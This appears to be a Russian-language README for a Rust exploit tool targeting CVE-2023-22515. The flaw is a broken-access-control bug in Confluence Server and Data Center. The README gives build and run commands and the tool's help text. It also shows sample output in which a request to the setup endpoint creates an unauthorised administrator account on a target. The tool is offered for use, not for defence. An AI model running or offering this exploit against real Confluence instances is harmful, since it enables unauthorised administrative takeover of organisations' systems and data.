
Rust-эксплойт для CVE-2023-22515, который создаёт несанкционированные учётные записи администратора в Confluence Server и Data Center через нарушенный контроль доступа.
Confluence — это веб-ориентированная корпоративная вики, разработанная австралийской компанией Atlassian. Компания Atlassian была уведомлена о проблеме, о которой сообщили некоторые клиенты: внешние злоумышленники могли использовать ранее неизвестную уязвимость в публично доступных серверах Confluence и центрах обработки данных для создания несанкционированных учётных записей администратора Confluence и получения доступа к экземплярам Confluence.
Уязвимость классифицирована как CVE-2023-22515
Сначала выполните компиляцию с помощью команды:
cargo build --release
Это можно сделать двумя способами:
cargo run -- --target http://localhost --username "teste" --password "teste"
.\target\release\cve_2023_22515 --target http://localhost --username "teste" --password "teste"
Это отобразит справку по инструменту. Вот все параметры, которые он поддерживает:
CVE-2023-22515
Usage: CVE_2023_22515 --target <TARGET> --username <USERNAME> --password <PASSWORD>
Options:
-t, --target <TARGET> Insert target
-u, --username <USERNAME> Insert username
-p, --password <PASSWORD> Insert password
-h, --help Print help
cargo run -- --target http://example.com --username "teste" --password "teste"
[!] Request for: http://example.com/setup/setupadministrator.action
[!] Creating Administrator account
[!] Checking the answer
[+] Username created successfully: teste
[+] Password created successfully: teste
[+] Exploit ending successfully!!